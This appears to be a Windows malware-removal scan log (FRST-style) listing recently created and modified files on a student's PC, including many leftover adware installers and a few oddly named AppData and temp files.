2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 20:18 - 2016-02-25 20:18 - 00537031 _____ C:\Users\Lexi\Downloads\msert.exe
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-24 18:01 - 2016-02-24 18:01 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 19:59 - 2016-02-20 19:59 - 00262144 _____ C:\WINDOWS\Minidump\022016-45890-01.dmp
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-17 18:02 - 2016-03-08 22:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-02-17 18:02 - 2016-02-17 18:02 - 00002523 _____ C:\Users\Public\Desktop\Evernote.lnk
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 09:09 - 2016-01-30 23:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-07 10:25 - 2016-02-07 10:25 - 00143306 _____ C:\Users\Lexi\Downloads\Module_1 (3).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 22:49 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 22:17 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-08 22:11 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-08 22:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 22:08 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-08 22:06 - 2016-01-28 15:11 - 00000000 ____D C:\Program Files (x86)\Avidemux 2.6 - 32 bits
2016-03-08 22:06 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-08 22:06 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-08 22:06 - 2013-06-18 14:18 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46
2016-03-08 22:06 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-08 22:06 - 2010-08-13 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.com
2016-03-08 22:05 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-08 22:05 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-08 22:05 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinMetadata
2016-03-08 22:05 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-08 22:05 - 2013-09-26 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skitch
2016-03-08 22:05 - 2013-07-20 16:02 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClockworkMod
2016-03-08 22:05 - 2011-08-24 08:48 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Duplicate Cleaner
2016-03-08 22:05 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-03-08 22:04 - 2016-02-01 17:19 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-08 22:04 - 2016-01-28 16:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:04 - 2016-01-28 15:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32bits)
2016-03-08 22:04 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-08 22:04 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-08 22:04 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-08 22:04 - 2013-01-17 18:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BodyMedia
2016-03-08 22:04 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Scholastic
2016-03-08 22:04 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-08 22:04 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-08 22:04 - 2011-08-24 08:18 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-03-08 22:04 - 2011-06-14 21:43 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\FunWebProducts
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\Local\Conduit
2016-03-08 22:04 - 2010-09-24 19:55 - 00000000 ____D C:\Users\Lexi\Documents\Audible
2016-03-08 22:04 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-08 22:03 - 2016-01-28 16:40 - 00000000 ____D C:\Program Files (x86)\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:03 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-08 22:03 - 2013-07-20 16:01 - 00000000 ____D C:\Program Files (x86)\ClockworkMod
2016-03-08 22:03 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\Fast Free Converter
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\MixiDJ_V46
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\Conduit
2016-03-08 22:03 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-08 22:03 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-08 22:03 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-08 22:03 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-08 22:03 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-08 22:03 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-08 22:03 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-08 22:03 - 2011-08-24 08:48 - 00000000 ____D C:\Program Files (x86)\Duplicate Cleaner
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iTunes
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iPod
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files\Bonjour
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-03-08 22:03 - 2011-01-14 18:51 - 00000000 ____D C:\Program Files (x86)\Cozi Express
2016-03-08 22:03 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 22:03 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-08 21:48 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-08 21:47 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-08 21:42 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-08 21:41 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-08 21:38 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2016-03-08 21:38 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-08 21:37 - 2011-08-24 08:17 - 00000000 ____D C:\ProgramData\Apple
2016-03-08 21:36 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files\Google
2016-03-08 21:34 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-08 21:10 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-26 12:07 - 2010-09-04 17:25 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\AnVi
2016-02-25 22:42 - 2015-08-27 20:11 - 01005598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-25 20:45 - 2010-08-30 21:35 - 00012288 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-02-20 19:59 - 2013-01-13 11:18 - 630943674 _____ C:\WINDOWS\MEMORY.DMP
2016-02-20 14:50 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-02-19 17:17 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-19 17:17 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-16 22:45 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-10 14:17 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-10 14:01 - 2013-05-27 17:31 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-25 20:45 - 0012288 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-31 16:17 - 2011-08-31 16:17 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2012-01-21 20:50 - 2012-01-21 20:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-11-18 10:20 - 2011-11-18 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-09-04 17:44 - 2011-09-04 17:44 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2011-09-28 21:30 - 2011-09-28 21:30 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-09-10 09:35 - 2011-09-10 09:35 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2011-11-30 23:09 - 2011-11-30 23:09 - 0091712 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Lexi\FileThisDesktopInstaller.exe


Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\Foxit Updater.exe
C:\Users\Lexi\AppData\Local\Temp\Runner.exe
